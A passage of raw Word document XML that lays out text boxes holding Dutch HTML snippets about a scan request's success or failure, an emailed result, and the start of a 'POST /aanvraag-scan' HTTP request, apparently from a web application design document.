                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>&lt;h3&gt;</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>Aanvraag</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> was </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>niet</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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succesvol</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>&lt;/h3&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5605095A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00682D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46EB1" id="Text Box 200" o:spid="_x0000_s1075" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-20.5pt;margin-top:505.2pt;width:462.55pt;height:80.2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nZ6HIoCAACOBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtI27Wjq0hRB2KahAAN&#10;Jp5dx6bWHJ9nX5t0f/3OTlIqxgvTXpLzfX/87s7O29qynQrRgCv5+GTEmXISKuOeSv7j4erDnLOI&#10;wlXCglMl36vIz5fv3501fqEmsAFbqcDIiYuLxpd8g+gXRRHlRtUinoBXjoQaQi2QnuGpqIJoyHtt&#10;i8lo9KloIFQ+gFQxEveyE/Jl9q+1knirdVTIbMkpN8zfkL/r9C2WZ2LxFITfGNmnIf4hi1oYR0EP&#10;ri4FCrYN5i9XtZEBImg8kVAXoLWRKtdA1YxHL6q53wivci3UnOgPbYr/z6282d0FZqqSUzc5c6Km&#10;IT2oFtkXaFniUYcaHxekeO9JFVsS0KQHfiRmKrzVoU5/KomRnHztD/1N7iQxZ/PT6cf5jDNJsvFo&#10;PJ9Ns//i2dyHiF8V1CwRJQ80wNxXsbuOSKmQ6qCSojm4MtbmIVqXGBGsqRIvPxKK1IUNbCdo/tjm&#10;rMnFkRa9OkuV0dJHSRV3lWUK91Ylh9Z9V5q6lQt8JYKQUjkcomTtpKUpn7cY9vrJtMvqLcYHixwZ&#10;HB6Ma+Mg5G7m9XpuTPVzSFl3+tTno7oTie26zTCZTobJr6HaEyACdEsVvbwyNLRrEfFOBNoiwgBd&#10;Brylj7bQlBx6irMNhN+v8ZM+gZuknDW0lSWPv7YiKM7sN0ew/zyeEmQY5sd0djqhRziWrI8lbltf&#10;AA1+TDfIy0wmfbQDqQPUj3RAVikqiYSTFJuQMpAX2N0KOkBSrVZZiRbXC7x2914m16nNCZIP7aMI&#10;vsctEuRvYNhfsXgB3043WTpYbRG0ydhOje662g+Alj5Dvj9Q6aocv7PW8xld/gEAAP//AwBQSwME&#10;FAAGAAgAAAAhAOa1OGnjAAAADQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FrwkAQhe+F/odlCr3p&#10;bkrQkGYjrSIUsQe1SI9rdpqEZmdDdtX47zs9tcd57/Hme8VidJ244BBaTxqSqQKBVHnbUq3h47Ce&#10;ZCBCNGRN5wk13DDAory/K0xu/ZV2eNnHWnAJhdxoaGLscylD1aAzYep7JPa+/OBM5HOopR3Mlctd&#10;J5+UmklnWuIPjelx2WD1vT87DW+H22Y3X77P3OZ19bk9ynBcr7ZaPz6ML88gIo7xLwy/+IwOJTOd&#10;/JlsEJ2GSZrwlsiGSlQKgiNZliYgTiwlc5WBLAv5f0X5AwAA//8DAFBLAQItABQABgAIAAAAIQDk&#10;mcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAG&#10;AAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAG&#10;AAgAAAAhAMJ2ehyKAgAAjgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAOa1OGnjAAAADQEAAA8AAAAAAAAAAAAAAAAA4gQAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAADyBQAAAAA=&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4D3CDCAE" w14:textId="5D542521" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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32EAD647" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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3FD4320" w14:textId="67C11226" w:rsidR="00CE4BB5" w:rsidRPr="00D60785" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>&lt;h3&gt;</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>Aanvraag</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> was </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>niet</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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succesvol</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>&lt;/h3&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="5605095A" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00682D1F"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00710940">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251916288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C1B9C9B" wp14:editId="411B1FC2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5708015</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3446145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56" name="Curved Left Arrow 56"/>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B99C73" id="Curved Left Arrow 56" o:spid="_x0000_s1026" type="#_x0000_t103" style="position:absolute;margin-left:449.45pt;margin-top:271.35pt;width:22pt;height:45pt;z-index:251916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4gVJsCAADABQAADgAAAGRycy9lMm9Eb2MueG1srFRNb9swDL0P2H8QdF8dB0m7BnWKIEWHAUFX&#10;rB16VmQpNiCLGqXEyX79KNlx+oUNGHaRRZN8JJ9IXl3vG8N2Cn0NtuD52YgzZSWUtd0U/Mfj7afP&#10;nPkgbCkMWFXwg/L8ev7xw1XrZmoMFZhSISMQ62etK3gVgptlmZeVaoQ/A6csKTVgIwKJuMlKFC2h&#10;NyYbj0bnWQtYOgSpvKe/N52SzxO+1kqGb1p7FZgpOOUW0onpXMczm1+J2QaFq2rZpyH+IYtG1JaC&#10;DlA3Igi2xfoNVFNLBA86nEloMtC6lirVQNXko1fVPFTCqVQLkePdQJP/f7DybnePrC4LPj3nzIqG&#10;3mi5xZ0q2UrpwBaI0DLSEVGt8zOyf3D32EuerrHqvcYmfqketk/kHgZy1T4wST/HF5eTET2BJNX0&#10;Ip/SnVCyk7NDH74oaFi8FFymLGISKYfErtitfOi8jtYxrAdTl7e1MUmIraOWBtlO0KOvN+M+zgsr&#10;Y//mGPb5W0dKN3pmkYqu+HQLB6MinrHflSY2Y7kp4dTHp2SElMqGvFNVolRdjsTFwMbgkbhJgBFZ&#10;U3UDdg/wstAjdkdPbx9dVRqDwXn0p8Q658EjRQYbBuemtoDvARiqqo/c2R9J6qiJLK2hPFCvIXRD&#10;6J28remlV8KHe4E0ddQctEnCNzq0gbbg0N84qwB/vfc/2tMwkJazlqa44P7nVqDizHy1NCaX+WQS&#10;xz4Jk+nFmAR8rlk/19htswTqmZx2lpPpGu2DOV41QvNEC2cRo5JKWEmxqVcDHoVl6LYLrSypFotk&#10;RqPuRFjZBycjeGQ1tu/j/kmg69s90JzcwXHixexVq3e20dPCYhtA12kOTrz2fNOaSI3Tr7S4h57L&#10;yeq0eOe/AQAA//8DAFBLAwQUAAYACAAAACEA7Hrrld4AAAALAQAADwAAAGRycy9kb3ducmV2Lnht&#10;bEyPwU7DMAyG70i8Q2QkbixdGSUtdSc0CYkh7cCAe9aatqJxqibbyttjTnD070+/P5fr2Q3qRFPo&#10;PSMsFwko4to3PbcI729PNwZUiJYbO3gmhG8KsK4uL0pbNP7Mr3Tax1ZJCYfCInQxjoXWoe7I2bDw&#10;I7HsPv3kbJRxanUz2bOUu0GnSZJpZ3uWC50dadNR/bU/OoRdZnzG89Y805YTrzfLsX/5QLy+mh8f&#10;QEWa4x8Mv/qiDpU4HfyRm6AGBJObXFCEu1V6D0qIfJVKckDIbiXRVan//1D9AAAA//8DAFBLAQIt&#10;ABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10u&#10;eG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5y&#10;ZWxzUEsBAi0AFAAGAAgAAAAhAFc+IFSbAgAAwAUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9E&#10;b2MueG1sUEsBAi0AFAAGAAgAAAAhAOx665XeAAAACwEAAA8AAAAAAAAAAAAAAAAA8wQAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAD+BQAAAAA=&#10;" adj="16320,20280,5400" fillcolor="#e7e6e6 [3214]" strokecolor="black [3213]" strokeweight="1pt">
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00710940">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251886592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="11C94976" wp14:editId="10C29990">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-264160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3789045</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5874385" cy="1018540"/>
                <wp:effectExtent l="0" t="0" r="18415" b="22860"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="204" name="Text Box 204"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5874385" cy="1018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881D9F4" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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78932447" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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46CF7082" w14:textId="6FACBEF5" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00BE198D">
                            <w:pPr>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>&lt;h3&gt;</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>Aanvraag</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> is </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>succesvol</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>&lt;/h3&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="38EF19B0" w14:textId="63D424D5" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00BE198D">
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t xml:space="preserve">&lt;p&gt;Het </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>resultaat</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> van de scan </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t>wordt</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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naar</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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uw</w:t>
                            </w:r>
                            <w:proofErr w:type="spell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opgegeven</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                                <w:color w:val="000000"/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> email &lt;/p&gt;</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7F853950" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4B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94976" id="Text Box 204" o:spid="_x0000_s1076" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-20.8pt;margin-top:298.35pt;width:462.55pt;height:80.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k2bowCAACOBQAADgAAAGRycy9lMm9Eb2MueG1srFTdT9swEH+ftP/B8vtIW9rRVaSoAzFNQoAG&#10;E8+uY9Nots+zr026v35nJykV2wvTXpLzfX/87s4vWmvYToVYgyv5+GTEmXISqto9l/z74/WHOWcR&#10;hauEAadKvleRXyzfvztv/EJNYAOmUoGRExcXjS/5BtEviiLKjbIinoBXjoQaghVIz/BcVEE05N2a&#10;YjIafSwaCJUPIFWMxL3qhHyZ/WutJN5pHRUyU3LKDfM35O86fYvluVg8B+E3tezTEP+QhRW1o6AH&#10;V1cCBduG+g9XtpYBImg8kWAL0LqWKtdA1YxHr6p52Aivci3UnOgPbYr/z6283d0HVlcln4ymnDlh&#10;aUiPqkX2GVqWeNShxscFKT54UsWWBDTpgR+JmQpvdbDpTyUxklOv94f+JneSmLP52fR0PuNMkmw8&#10;Gs9n0zyB4sXch4hfFFiWiJIHGmDuq9jdRKRUSHVQSdEcXNfG5CEalxgRTF0lXn4kFKlLE9hO0Pyx&#10;zVmTiyMtenWWKqOlj5Iq7irLFO6NSg6N+6Y0dSsX+JcIQkrlcIiStZOWpnzeYtjrJ9Muq7cYHyxy&#10;ZHB4MLa1g5C7mdfrpTHVjyFl3elTn4/qTiS26zbDZHo6TH4N1Z4AEaBbqujldU1DuxER70WgLSIM&#10;0GXAO/poA03Joac420D49Td+0idwk5Szhray5PHnVgTFmfnqCPafxlOCDMP8mM7OJvQIx5L1scRt&#10;7SXQ4Md0g7zMZNJHM5A6gH2iA7JKUUkknKTYhJSBvMTuVtABkmq1ykq0uF7gjXvwMrlObU6QfGyf&#10;RPA9bpEgfwvD/orFK/h2usnSwWqLoOuM7dTorqv9AGjpM+T7A5WuyvE7a72c0eVvAAAA//8DAFBL&#10;AwQUAAYACAAAACEAUV+48OQAAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPTU/CQBCG7yb+h82Y&#10;eINt1X5YOyUKITEED4AhHpd2bBu7s013gfLvWU96nLxP3veZfDbqTpxosK1hhHAagCAuTdVyjfC5&#10;W05SENYprlRnmBAuZGFW3N7kKqvMmTd02rpa+BK2mUJonOszKW3ZkFZ2anpin32bQSvnz6GW1aDO&#10;vlx38iEIYqlVy36hUT3NGyp/tkeN8L67rDbJ/CPWq7fF13ov7X65WCPe342vLyAcje4Phl99rw6F&#10;dzqYI1dWdAiTpzD2KEL0HCcgPJGmjxGIA0ISJSHIIpf/fyiuAAAA//8DAFBLAQItABQABgAIAAAA&#10;IQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0A&#10;FAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAAAAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0A&#10;FAAGAAgAAAAhAHZJNm6MAgAAjgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsB&#10;Ai0AFAAGAAgAAAAhAFFfuPDkAAAACwEAAA8AAAAAAAAAAAAAAAAA5AQAAGRycy9kb3ducmV2Lnht&#10;bFBLBQYAAAAABAAEAPMAAAD1BQAAAAA=&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0881D9F4" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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78932447" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="000B674F" w:rsidRDefault="00CE4BB5"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46CF7082" w14:textId="6FACBEF5" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00BE198D">
                      <w:pPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>&lt;h3&gt;</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>Aanvraag</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> is </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>succesvol</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>&lt;/h3&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="38EF19B0" w14:textId="63D424D5" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00BE198D">
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t xml:space="preserve">&lt;p&gt;Het </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>resultaat</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> van de scan </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t>wordt</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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naar</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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uw</w:t>
                      </w:r>
                      <w:proofErr w:type="spell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opgegeven</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                          <w:color w:val="000000"/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> email &lt;/p&gt;</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7F853950" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00710940">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251888640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61DA2073" wp14:editId="6DDB2DBC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-258445</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2870200</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5867400" cy="726440"/>
                <wp:effectExtent l="0" t="0" r="25400" b="35560"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="207" name="Text Box 207"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5867400" cy="7264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B0DABBC" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00105199">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t xml:space="preserve">POST </w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>aanvraag</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>-</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>scan HTTP</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="808030"/>
                              </w:rPr>
                              <w:t>/</w:t>
                            </w:r>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="008000"/>
                              </w:rPr>
                              <w:t>1.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="102CB70E" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00105199">
                            <w:pPr>
                              <w:pStyle w:val="HTMLPreformatted"/>
                              <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
                              <w:rPr>
